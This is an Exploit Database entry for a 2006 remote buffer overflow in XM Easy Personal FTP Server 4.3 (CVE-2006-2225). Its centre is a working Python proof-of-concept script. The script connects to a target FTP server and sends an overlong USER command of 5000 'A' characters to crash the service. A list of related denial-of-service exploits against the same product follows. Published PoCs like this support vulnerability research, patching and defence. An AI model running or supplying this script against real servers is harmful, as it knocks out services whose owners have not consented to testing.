Exploit Database - Logo

XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)

EDB-ID: 1748 Author: rewterz Published: 2006-05-04
CVE: CVE-2006-2225 Type: Dos Platform: Windows
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
##############################################################
# XM EASY PERSONAL FTP SERVER v4.3                           #  
# http://www.securityfocus.com/archive/1/432960/30/0/threaded# 
# Buffer Overflow Vulnerability PoC                          #  
# ahmed@rewterz.com                                          #
##############################################################

import socket
import struct
import time
import sys


buff='USER '+'A'*5000+'\r\n'

if len(sys.argv)!=3:
	print "[+] Usage: %s <ip> <port> \n" %sys.argv[0]
	sys.exit(0)

try:
	
        print "[+] Connecting to %s" %sys.argv[1]
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect((sys.argv[1],int(sys.argv[2])))
	print "[+] Sending Evil buffer"
	time.sleep(1)
	s.send(buff)
        print "[+] Service Crashed"
        s.recv(1024)
	
except:
	print "[+] Could Not Connect To ftp server"

# milw0rm.com [2006-05-04]
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (1): CVE-2006-2225
Trying to match OSVDBs (1): 25277
Trying to match setup file: 4174bf3dfedf4bc154d80a86d200b986
Other Possible E-DB Search Terms: XM Easy Personal FTP Server 4.3,  XM Easy Personal FTP Server
Date D V Title Author
2008-04-13 Verified XM Easy Personal FTP Server 5.4.0 - 'XCWD' Denial of Servicej0rgan
2016-02-19 Waiting verification XM Easy Personal FTP Server 5.8.0 - 'HELP' Remote Denial of ServicePawan Lal
2009-11-13 Verified XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Servicezhangmc
2006-12-22 Verified XM Easy Personal FTP Server 5.2.1 - 'USER' Format String Denial of Serviceshinnai
2006-11-04 Verified XM Easy Personal FTP Server 5.2.1 - Remote Denial of Serviceboecke
2007-02-28 Verified XM Easy Personal FTP Server 5.30 - 'ABOR' Format String Denial of ServiceUmesh Wanve
2012-06-14 Verified XM Easy Personal FTP Server 5.30 - Remote Format String Write4mr_me
2011-02-10 Verified XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of ServiceHoussam Sahli
2009-11-10 Verified XM Easy Personal FTP Server 5.8.0 - Denial of Service (Metasploit)zhangmc
2009-11-24 Verified XM Easy Personal FTP Server 5.8.0 - Remote Denial of Serviceleinakesi
2006-03-04 Verified XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)luka.research
2006-06-24 Verified XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)Jerome Athias
2008-10-13 Verified XM Easy Personal FTP Server 5.6.0 - Remote Denial of Serviceshinnai
2009-03-27 Verified XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of ServiceJonathan Sa...
Menu